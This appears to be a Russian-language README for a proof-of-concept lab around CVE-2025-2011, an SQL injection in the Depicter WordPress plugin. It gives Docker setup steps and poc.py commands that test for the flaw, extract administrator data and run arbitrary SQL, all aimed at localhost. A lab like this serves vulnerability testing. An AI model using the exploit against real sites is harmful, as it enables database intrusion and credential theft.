
PoC для CVE-2025-2011 - SQLi в плагине Depicter <= 3.6.1
Ссылка на CVE: CVE-2025-2011
Этот репозиторий содержит среду для проверки концепции (proof-of-concept) тестирования уязвимости SQL-инъекции в плагине Depicter Slider & Popup Builder (версии < 3.6.2).
requests, coloramaЗапустите окружение
docker-compose up -d
Завершите установку WordPress
http://localhost:5555Установите уязвимый плагин
chmod +x install-plugin.sh
./install-plugin.sh
Этот скрипт выполнит:
Установите зависимости Python
pip install requests colorama
Скрипт PoC (poc.py) можно использовать для тестирования уязвимости в разных режимах:
Проверить, уязвима ли цель
python poc.py -u http://localhost:5555
Извлечь данные администратора
python poc.py -u http://localhost:5555 -m admin
Выполнить произвольный SQL-запрос
python poc.py -u http://localhost:5555 -m custom -q "SELECT VERSION()"
Включить отладочный вывод
python poc.py -u http://localhost:5555 -d
Чтобы остановить и удалить окружение:
docker-compose down -v
Это окружение предоставлено только в образовательных и тестовых целях. Не используйте его против каких-либо систем без явного разрешения.